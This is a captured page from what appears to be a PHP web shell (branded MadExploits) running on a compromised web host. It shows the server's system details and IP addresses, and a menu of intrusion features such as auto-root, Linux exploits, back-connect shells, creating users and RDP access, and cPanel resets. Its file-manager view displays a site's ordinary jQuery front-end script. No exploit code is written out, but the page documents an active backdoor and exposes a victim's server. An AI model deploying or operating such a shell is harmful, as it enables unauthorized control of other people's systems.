Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.116.10.48
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
cgpunch /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
vendor
[ DIR ]
drwxr-xr-x
contact.js
1.28
KB
-rw-r--r--
main.js
7.14
KB
-rw-r--r--
script.js
1.19
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : main.js
/* Scripts */ (function($){ "use strict"; $(window).on('load', function() { $('body').addClass('loaded'); }); /*========================================================================= Sticky Header =========================================================================*/ $(function() { var header = $("#header"), height = header.height(), yOffset = 0, triggerPoint = 100; $('.header-height').css('height', height+'px'); $(window).on( 'scroll', function() { yOffset = $(window).scrollTop(); if (yOffset >= triggerPoint) { header.removeClass("animated cssanimation fadeIn"); header.addClass("navbar-fixed-top cssanimation animated fadeInTop"); } else { header.removeClass("navbar-fixed-top cssanimation animated fadeInTop"); header.addClass("animated cssanimation fadeIn"); } }); }); /*========================================================================= Nivo slider =========================================================================*/ $('#main-slider').nivoSlider({ effect: 'random', animSpeed: 300, pauseTime: 5000, directionNav: true, manualAdvance: false, controlNavThumbs: false, pauseOnHover: true, controlNav: false, prevText: "<i class='ti-arrow-left'></i>", nextText: "<i class='ti-arrow-right'></i>" }); /*========================================================================= Mobile Menu =========================================================================*/ $(function(){ $('#mainmenu').slicknav({ prependTo: '.site-branding', label: '', allowParentLinks: true }); }); /*========================================================================= Counter Up Active =========================================================================*/ var counterSelector = $('.counter'); counterSelector.counterUp({ delay: 10, time: 1000 }); /*========================================================================= Event Carousel =========================================================================*/ $('#event-carousel').owlCarousel({ loop: true, margin: 15, autoplay: false, smartSpeed: 500, nav: true, navText: ['<i class="ti-arrow-left"></i>', '<i class="ti-arrow-right"></i>'], dots: false, responsive : { 0 : { items: 1 }, 480 : { items: 1, }, 768 : { items: 2, }, 992 : { items: 2, } } }); /*========================================================================= Isotope Active =========================================================================*/ $('.gallery-items').imagesLoaded( function() { // Add isotope click function $('.gallery-filter li').on( 'click', function(){ $(".gallery-filter li").removeClass("active"); $(this).addClass("active"); var selector = $(this).attr('data-filter'); $(".gallery-items").isotope({ filter: selector, animationOptions: { duration: 750, easing: 'linear', queue: false, } }); return false; }); $(".gallery-items").isotope({ itemSelector: '.single-item', layoutMode: 'masonry', }); }); /*========================================================================= Initialize smoothscroll plugin =========================================================================*/ smoothScroll.init({ offset: 60 }); /*========================================================================= Testimonial Carousel =========================================================================*/ $('#testimonial-carousel').owlCarousel({ loop: true, margin: 15, autoplay: true, smartSpeed: 500, items: 1, nav: false, dots: true, responsive : { 0 : { items: 1, }, 480 : { items: 2, }, 768 : { items: 2 }, 992 : { items: 3 } } }); /*========================================================================= Sponsor Carousel =========================================================================*/ $('#sponsor-carousel').owlCarousel({ loop: true, margin: 40, autoplay: true, smartSpeed: 500, nav: false, dots: false, responsive : { 0 : { items: 2 }, 480 : { items: 3, }, 768 : { items: 4 }, 992 : { items: 6 } } }); /*========================================================================= Active venobox =========================================================================*/ $('.img-popup').venobox({ numeratio: true, infinigall: true }); /*========================================================================= WOW Active =========================================================================*/ new WOW().init(); /*========================================================================= Scroll To Top =========================================================================*/ $(window).on( 'scroll', function () { if ($(this).scrollTop() > 100) { $('#scroll-to-top').fadeIn(); } else { $('#scroll-to-top').fadeOut(); } }); // new Krisnajay Script })(jQuery); jQuery(document).ready(function() { jQuery('.Slider-vid').owlCarousel({ loop:true, margin:30, nav:true, smartSpeed: 500, autoplay:false, dots:false, navText:['<i class="fa-solid fa-angle-left"></i>','<i class="fa-solid fa-angle-right"></i>'], items:4, responsive:{ 0:{ items:1, nav:true }, 480:{ items:2, nav:true }, 992:{ items:3, nav:true }, 1050:{ items:4, nav:true } } }); // home jQuery('.SliderHome').owlCarousel({ loop:false, margin:30, nav:true, smartSpeed: 500, autoplay:true, dots:false, navText:['<i class="fa-solid fa-angle-left"></i>','<i class="fa-solid fa-angle-right"></i>'], items:1, responsive:{ 0:{ items:1, nav:true }, 480:{ items:1, nav:true }, 992:{ items:1, nav:true }, 1050:{ items:1, nav:true } } }); });
Close